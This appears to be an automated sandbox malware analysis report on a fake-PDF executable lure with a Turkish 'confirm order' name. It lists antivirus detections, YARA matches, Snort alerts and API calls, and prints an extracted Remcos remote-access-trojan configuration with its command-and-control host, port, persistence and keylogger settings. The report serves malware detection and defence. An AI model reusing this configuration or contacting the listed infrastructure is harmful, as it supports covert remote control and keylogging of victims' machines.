Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3971194.72.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3acc6a8.41.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3966924.76.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac1b54.31.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3965ee4.90.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ad1194.73.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ad4008.91.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ad28f8.35.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39728f8.35.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ae2814.99.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396413c.61.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 15.2.DpiScaling.exe.400000.0.unpack Avira: Label: BDS/Backdoor.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3966924.77.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39794ec.80.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac803c.108.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.395844c.5.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.2.Eluiezilfw.exe.22a33e8.3.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396413c.59.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ad8008.105.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.2.Eluiezilfw.exe.10540000.8.unpack Avira: Label: TR/Crypt.Morphine.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.395e4d0.11.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3addbec.69.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ad9a8c.88.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.2.Eluiezilfw.exe.2264588.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.397dbec.67.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39754e0.103.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ad3e08.77.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396d700.52.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3964008.57.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3968560.28.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac7bf0.17.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac6c84.100.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac6c84.102.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3aca22c.33.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac00d8.19.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac2dac.51.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3acff08.24.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ad3950.86.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3975fb8.44.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3acff08.24.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac6c84.101.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac6588.94.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3967bf0.16.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac413c.59.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3adafd8.37.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3975fb8.42.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac3034.53.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac6924.76.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396ff08.23.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.2.Eluiezilfw.exe.3168bd8.4.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3973950.87.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3abdda4.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3abdda4.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3964578.12.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3abe4d0.11.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3965ecc.86.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396704c.4.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3961b54.31.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac8008.22.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 15.2.DpiScaling.exe.10540000.1.unpack Avira: Label: TR/Crypt.Morphine.Gen
Source: 8.3.Eluiezilfw.exe.3ac00d8.18.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac03a8.27.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3973e08.79.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac413c.60.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39603a8.26.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.397d83c.74.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3971194.73.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac6c84.100.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3abe240.7.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac2dac.49.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ae4008.38.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ad46cc.98.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ad17a0.67.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac52c8.9.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3acc008.5.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac0168.22.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac4578.10.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ad28f8.32.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac26fc.0.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3963034.55.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3962dac.49.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3979a8c.88.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac4ae4.70.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39626fc.2.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ad3e08.79.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac4008.58.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3966588.95.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.2.Eluiezilfw.exe.232a7c8.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396a22c.33.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac6d08.104.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ae4008.36.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3aca22c.31.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3adafd8.34.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 3.0.logagent.exe.10540000.0.unpack Avira: Label: TR/Crypt.Morphine.Gen
Source: 8.3.Eluiezilfw.exe.3ad8008.107.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.397f8dc.45.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac6d08.104.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac704c.2.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ad9a8c.89.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.397bf00.63.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac3034.53.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac03a8.25.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39600d8.19.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3acbbdc.13.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ad1194.71.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac4ae4.70.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac4348.65.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ad4008.93.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.23635e8.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac704c.4.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac4008.57.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3968560.27.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.2.Eluiezilfw.exe.3ab844c.5.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac5ee4.90.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ad17a0.67.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac6588.96.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ad54e0.101.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3adf8dc.45.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3963034.53.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3acdc40.56.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3978008.106.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ad3950.87.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac5ecc.85.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac0024.15.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac8560.28.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3acc008.5.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ad17a0.65.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39746cc.98.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ad46cc.96.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39652c8.9.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 3.2.logagent.exe.10540000.1.unpack Avira: Label: TR/Crypt.Morphine.Gen
Source: 8.3.Eluiezilfw.exe.3ac5ecc.84.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.397d83c.75.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ae2814.97.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3acdc40.56.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ad5fb8.44.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396217c.47.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 14.2.logagent.exe.400000.0.unpack Avira: Label: BDS/Backdoor.Gen
Source: 15.0.DpiScaling.exe.10540000.0.unpack Avira: Label: TR/Crypt.Morphine.Gen
Source: 13.3.Eluiezilfw.exe.3ac5ee4.92.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396ff08.24.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3967bf0.17.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3960024.15.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396803c.108.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.22ea9c8.3.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3acd700.50.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ad5fb8.42.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3addbec.68.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.2.Eluiezilfw.exe.3ab844c.5.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac4348.64.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac4008.57.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 15.2.DpiScaling.exe.1054198f.2.unpack Avira: Label: BDS/Backdoor.Gen
Source: 13.3.Eluiezilfw.exe.3ac704c.3.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac413c.60.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.2.Eluiezilfw.exe.222a7c8.2.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac5ee4.90.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac6588.94.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ad1194.71.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ad3950.87.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac4348.66.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac6588.95.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3979a8c.89.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ae4008.38.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3974008.93.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ad8008.107.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39652c8.7.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39794ec.82.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ad3950.85.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ad28f8.35.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3965ecc.84.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ad1194.74.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3adafd8.37.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ad9a8c.89.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3aca22c.33.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ae2814.99.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac4008.58.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3973950.85.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 15.0.DpiScaling.exe.10540000.2.unpack Avira: Label: TR/Crypt.Morphine.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3964008.58.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac5ecc.86.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3982814.97.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac2d80.40.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac217c.48.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3038bd8.4.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac4578.10.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac6924.78.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3adbf00.62.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac6924.78.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac8560.28.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3abe4d0.11.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3964348.64.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac3034.54.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3964348.65.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3964ae4.71.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3968008.21.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ad94ec.82.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0000000F.00000002.359362662.0000000004C00000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Remcos {"Host:Port:Password": "Pw`~hustlelord.ddns.net:5017:", "Assigned name": "BIG", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Remcos-MZPAVR", "Keylog flag": "0", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "wikipedia;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "10000"}

Exploits

Source: Yara match File source: 0.2.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3ad0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.Eluiezilfw.exe.3b0c37c.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Eluiezilfw.exe.3b0c37c.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.395844c.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.Eluiezilfw.exe.3ab844c.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Eluiezilfw.exe.3c30000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39ac37c.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Eluiezilfw.exe.3ab844c.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.Eluiezilfw.exe.3c30000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.348456214.0000000003C4C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.315970483.0000000003AEC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.347895283.0000000003AC8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.315787933.0000000003968000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.360606462.0000000003C4C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.360448965.0000000003AC8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe PID: 6356, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Eluiezilfw.exe PID: 6880, type: MEMORYSTR
Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: unknown HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.3:49745 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.3:49751 version: TLS 1.2
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_00412BEE wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 3_2_00412BEE
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_10548C1E getenv,FindFirstFileA,FindClose,GetLastError,GetLastError,FindClose, 3_2_10548C1E
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_10544CB4 FindFirstFileW, 3_2_10544CB4
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_1055457D FindFirstFileW,FindNextFileW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,FindClose, 3_2_1055457D
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_1054610D _EH_prolog,socket,connect,_CxxThrowException,FindFirstFileW,_CxxThrowException,FindNextFileW,_CxxThrowException,_CxxThrowException,FindClose,atoi,_CxxThrowException,atoi,FindClose,RtlExitUserThread, 3_2_1054610D
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_10546599 FindFirstFileW,FindNextFileW,FindClose, 3_2_10546599
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_10548EAA getenv,FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindClose,FindClose, 3_2_10548EAA
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_10551F15 FindFirstFileW, 3_2_10551F15

Networking

Source: Traffic Snort IDS: 2845323 ETPRO TROJAN MSIL/Remcos RAT CnC Keep-Alive (Outbound) 192.168.2.3:49778 -> 37.0.14.195:5017
Source: Traffic Snort IDS: 2844577 ETPRO TROJAN MSIL/Remcos RAT CnC Checkin M2 192.168.2.3:49778 -> 37.0.14.195:5017
Source: Traffic Snort IDS: 2845324 ETPRO TROJAN MSIL/Remcos RAT CnC Keep-Alive (Inbound) 37.0.14.195:5017 -> 192.168.2.3:49778
Source: Malware configuration extractor URLs: Pw`~hustlelord.ddns.net
Source: unknown DNS query: name: blessmyhustlelord.ddns.net
Source: Joe Sandbox View ASN Name: WKD-ASIE WKD-ASIE
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Joe Sandbox View IP Address: 162.159.130.233 162.159.130.233
Source: global traffic TCP traffic: 192.168.2.3:49746 -> 37.0.14.195:5017
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_1054EE74 URLDownloadToFileW,ShellExecuteW,??3@YAXPAX@Z, 3_2_1054EE74
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
